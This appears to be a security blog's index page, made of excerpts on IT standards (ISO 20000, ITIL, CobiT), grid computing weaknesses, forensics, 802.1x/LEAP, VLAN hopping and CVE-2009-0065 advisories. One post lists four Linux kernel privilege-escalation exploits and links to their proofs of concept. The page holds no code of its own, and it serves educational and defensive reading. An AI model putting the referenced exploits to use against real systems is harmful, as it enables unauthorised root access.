ISO/IEC 20000 is the first international standard for IT Service Management. It is based on and is intended to supersede the earlier British Standard, BS 15000.
Formally: ISO 20000-1 (‘part 1′) “promotes the adoption of an integrated process approach to effectively deliver managed services to meet the business and customer requirements”. It comprises ten sections:
- Scope
- Terms & Definitions
- Planning and Implementing Service Management
- Requirements for a Management System
- Planning & Implementing New or Changed Services
- Service Delivery Processes
- Relationship Processes
- Control Processes
- Resolution Processes
- Release Process.
ISO 20000-2 (‘part 2′) is a ‘code of practice’, and describes the best practices for service management within the scope of ISO 20000-1. It comprises the same sections as ‘part 1′ but excludes the ‘Requirements for a Management system’ as no requirements are imposed by ‘part 2′.
ISO 20000, like its BS 15000 predecessor, was originally developed to reflect best practice guidance contained within the ITIL (Information Technology Infrastructure Library) framework, although it equally supports other IT Service Management frameworks and approaches including Microsoft Operations Framework and components of ISACA’s CobIT framework. It comprises two parts: a specification for IT Service Management and a code of practice for service management. The differentiation between ISO 20000 and BS 15000 has been addressed by Jenny Dugmore.
The standard was first published in December 2005.
Taken From : http://en.wikipedia.org/wiki/ISO_20000
Introduction
Grid computing is kind of new technology which has been known since 1990s. It idea was brought together by Ian Foster, Carl Kesselman, and Steve Tuecke, widely regardes as “Father of Grid”. Grid computing is defined as group of node computation which works together in distributed computing. You can find some grid project in wikipedia article here.
Each node in grid has computer cluster to perform high performance computing through parallel computation. A computer cluster consists of a headnode (master) and some computational nodes (slaves). Headnode is responsible in communicating with the other headnode in grid, managing computation resource, and scheduling computation jobs to slave. We don’t want to explain detail how computer cluster works. In this article, our interest is in grid computing and why it’s vulnerable to some hacking exploitation.
How Grid Works
Grid computing is really complex inside its technology, so the chance of being exploited is really big. Grid computing needs a good network connectivity, many TCP/IP services, encryption, parallel programming, and web service. A headnode of cluster trusts the other because valid Certificate Authority (CA) is installed on both of headnode. CA which installed on headnode is called as Host CA. TCP/IP services is needed in headnode to send or receive data or execute jobs between two or more headnodes. There is two services in headnode which need to communicate a headnode to other, 1st is GridFTP service which is responsible in data transfer between two or more headnodes and 2nd is Web Service Container which is responsible in receiving jobs from user. Both services can be activated by installing Globus Toolkit which is de facto standard open source software for grid.
Read more »
I just look arround on milw0rm today and searching for linux kernel exploit, luckily i find four new linux kernel exploits.
- First exploit is to attack linux kernel locally using exit_notify() function vulnerability. This flaw affects linux kernel less than 2.6.29 (most of linux kernel). Just take a look here for the proof of concept.
- Second exploit is to attack linux kernel locally using UDEV vulnerability. Udev less than 1.4.1 is reported that it doesn’t verify wheter a NETLINK message originates from kernel space, which allows local users to gain root priviledge by sending a NETLINK message from user space. Let take a look here and here for the proof of concept.
- Third exploit is to attack linux kernel remotely using SCTP FWD memory corruption. Some people say this bug isn’t exploitable untill sgrakkyu gives his explanation. Sgrakkyu explanation can be read here, take a look here for the proof of concept. This flaw affects most of linux kernel.
- Fourth exploit is to attack linux kernel locally using ptrace_attach() function vulnerability. This flaw affects linux kernel version 2.6.29. Just take a look here and here for the proof of concept.
Now i just think, which is more secure by default “linux or windows??“, even openbsd which’s claimed as the most secured operating system has a stupid bugs inside its code.
Computer forensics is a branch of forensic science pertaining to legal evidence found in computers and digital storage mediums. Computer forensics is also known as digital forensics.
The goal of computer forensics is to explain the current state of a digital artifact. The term digital artifact can include a computer system, a storage medium (such as a hard disk or CD-ROM), an electronic document (e.g. an email message or JPEG image) or even a sequence of packets moving over a computer network. The explanation can be as straightforward as “what information is here?” and as detailed as “what is the sequence of events responsible for the present situation?”
The field of Computer Forensics also has sub branches within it such as Firewall Forensics, Database Forensics and Mobile Device Forensics.
There are many reasons to employ the techniques of computer forensics:
- In legal cases, computer forensic techniques are frequently used to analyze computer systems belonging to defendants (in criminal cases) or litigants (in civil cases).
- To recover data in the event of a hardware or software failure.
- To analyze a computer system after a break-in, for example, to determine how the attacker gained access and what the attacker did.
- To gather evidence against an employee that an organization wishes to terminate.
- To gain information about how computer systems work for the purpose of debugging, performance optimization, or reverse-engineering.
Read more »
Introduction
802.1x is an IEEE standard for port-based (well, we would rather say interface-based) enduser authentication on LANs. While it supports (and was initially designed for) Ethernet, the main current use of 802.1x is wireless users’ authentication as a part of the wireless security scheme provided by the 802.11i security standard. The 802.1x authentication chain consists of three elements:
- Supplicant An end-user station, often a laptop, that runs 802.1x client software.
- Authenticator A switch, a wireless gateway, or an access point to which the authenticating users connect. It must be configured to support 802.1x on the involved interfaces with commands like aaa authentication dot1x default group radius (global configuration) and dot1x port control auto (switch interface).
- Authentication server A RADIUS server to which authenticators forward end users’ authentication requests for verification and authentication decision.
EAP-LEAP Basics
The Extensible Authentication Protocol (EAP) is used by all three 802.1x component devices to communicate with each other. It is extensible since many different EAP types exist for all kinds of authentication plans—for example, employing SIM cards, tokens, certificates, and more traditional passwords. Here we are interested only in Cisco-related protocols and products, thus the security weaknesses of EAP-LEAP are the target of the discussion.
Read more »
Description
VLAN Hopping is an exploitation method used to attack a network with multiple VLANs. It is an attack that involves an attacking system to deploy packets. These packets have a destination of a system on a separate VLAN which would, in normal circumstances, not be accessible by the attacker. VLAN Hopping attacks are primarily conducted within the Dynamic Trunking Protocol (DTP). Often, VLAN Hopping attacks are directed at the trunking encapsulation protocol (802.1q or ISL).
Malicious traffic used for VLAN Hopping is tagged with a VLAN ID destined outside the VLAN on which the system conducting the attacks belongs to. An attacker can also attempt to behave and look like a switch, which will negotiate trunking, allowing the attacker to not only send, but receive traffic across more than one VLAN.
There are two common methods of VLAN Hopping; Switch Spoofing and Double Tagging.
Read more »
By IPSECS Admin. Posted in Management | Comments Off
In the bowl of alphabet soup that feeds our industry lurk two acronyms that actually have little to do with technology, and everything to do with how we use it: ITIL (the IT Infrastructure Library) and CobiT (Control Objectives for Information and related Technology).
These two complementary sets of best practices deal, respectively, with service management and with governance in IT organizations. Between them, the ITIL and CobiT provide guidelines to help companies cut support costs, increase IT efficiency, and meet regulatory requirements.
The ITIL was developed by the British government in the 1980s as a best practice framework for IT service management. It is vendor-independent, and the Crown still holds copyright to ensure no organization can hijack the framework for its own purposes. It really is a library, too, originally consisting of over forty individual volumes, each one dedicated to a separate area of service management. ITIL Service Management is currently embodied in the ISO 20000 standard (previously BS 15000).
Read more »
By IPSECS Admin. Posted in News | Comments Off
Click here to view our old researches. Enjoy!
By IPSECS Admin. Posted in Management | Comments Off
Introduction
How secure is your company’s information? In this age of distributed computing and of client-server and Internet-enabled information access, computer security consistently rises to the top of most “important issues†lists.
To answer this question with certainty is difficult. There are no absolutes with security. An important first step for most corporations is a security policy that establishes acceptable behavior. The next, and more critical step, is to enforce that security policy and measure its effectiveness. A security policy is in tension with user convenience, creating forces that move security practices away from security policy. Additionally when new machines or applications are configured the security related issues are often overlooked. Therefore the gap between central policy and decentralized practice can be immense. These are significant tasks, as are identifying problems and taking corrective action on a constantly changing network. Many enterprises typically fall back on blind faith rather than wrestle with the fear of the unknown.
Sources of Risk
In order to assess your true security profile, you must first understand the sources of risk. The most infamous risk is embodied by the external hacker accessing a corporate information systems via the Internet. Traditionally these hackers view breaking into a system as
mountain climbers view scaling a cliff, for them its the next great challenge. However, as ever increasing numbers of corporations interconnect their information systems successful break-ins become commercially rewarding. Practitioners of industrial espionage now view the computers on the Internet as valuable potential sources of information. Often these “professionals†masquerade as the traditional hacker to disguise their true purposes.
Although the threats from external attacks are real, they are not the principle source of risk. FBI statistics show that more than 60% of computer crimes originate inside the enterprise. These risks can take multiple forms. Unscrupulous employees may be searching for organizational advantages. A disgruntled employee may be co-opted by an industrial espionage agent. Increasingly corporations are turning to contractors for specialized skills or to absorb temporary increases in work-load. These contractors are often given access to the corporate information system and thus they can also present a risk to corporate information.
Lines of Defense for the Corporate Information System
Many enterprises erect a firewall as the first and often only line of defense for their information systems. A firewall is a device that controls the flow of communication between internal networks and external networks, such as the Internet. Many corporations assume that, once they have installed a firewall, they have reduced all their network security risks.
Read more »
Common Vulnerabilities and Exposures
http://cve.mitre.org/cgi-bi/cvename.cgi?name=CVE-2009-0065
“Buffer overflow in net/sctp/sm_statefuns.c in the Stream Control Transmission Protocol (sctp) implementation in the Linux kernel before 2.6.28-git8 allows remote attackers to have an unknown impact via an FWD-TSN (aka FORWARD-TSN) chunk with a large stream ID. “
Ubuntu Security Notice USN-751-1
http://www.ubuntu.com/usn/usn-751-1
“The SCTP stack did not correctly validate FORWARD-TSN packets. A remote attacker could send specially crafted SCTP traffic causing a system crash, leading to a denial of service. (CVE-2009-0065)”
RedHat Security Advisory
http://rhn.redhat.com/errata/RHSA-2009-0331.html
“a buffer overflow was found in the Linux kernel Partial Reliable Stream Control Transmission Protocol (PR-SCTP) implementation. This could, potentially, lead to a denial of service if a Forward-TSN chunk is received with a large stream ID. (CVE-2009-0065, Important) ”
Read more »